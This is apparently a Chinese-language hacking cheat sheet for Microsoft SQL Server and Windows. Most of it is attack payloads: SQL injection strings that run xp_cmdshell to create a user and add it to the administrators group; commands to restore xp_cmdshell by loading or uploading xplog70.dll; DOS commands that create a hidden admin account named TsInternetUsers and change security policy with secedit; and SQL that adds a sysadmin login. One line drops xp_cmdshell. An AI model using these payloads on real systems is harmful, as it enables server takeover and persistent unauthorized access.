;exec master..xp_cmdshell "net user name password /add"--
;exec master..xp_cmdshell "net localgroup administrators name /add"--
程序代码开启cmdshell的SQL语句
EXEC sp_addextendedproc xp_cmdshell ,@dllname =''xplog70.dll''
判断存储扩展是否存在
select count(*) from master.dbo.sysobjects where xtype=''X'' and name=''xp_cmdshell''
返回结果为1就OK
恢复xp_cmdshell
Exec master.dbo.addextendedproc ''xp_cmdshell'',''xplog70.dll'';select count(*) from master.dbo.sysobjects where xtype=''X'' and name=''xp_cmdshell''
返回结果为1就OK
否则上传xplog7.0.dll
Exec master.dbo.addextendedproc ''xp_cmdshell'',''C:/WinNt/System32/xplog70.dll''
堵上cmdshell的SQL语句
sp_dropextendedproc "xp_cmdshell"
DOS:
dir c:/
dir d:/
dir e:/
net user TsInternetUsers Password /add
net localGroup Administrators TsInternetUsers /add
备份恢复IPSEC
secedit /export /CFG c:/tmp.inf
echo sedenynetworklogonright =>>c:/tmp.inf
secedit /configure /db c:/windows/secedit.sdb /CFG c:/tmp.inf
SQL:
exec master..sp_addlogin UserName,Password
exec master..sp_addsrvrolemember UserName,sysadmin
http://netadmin.77169.com/HTML/20050916004147.html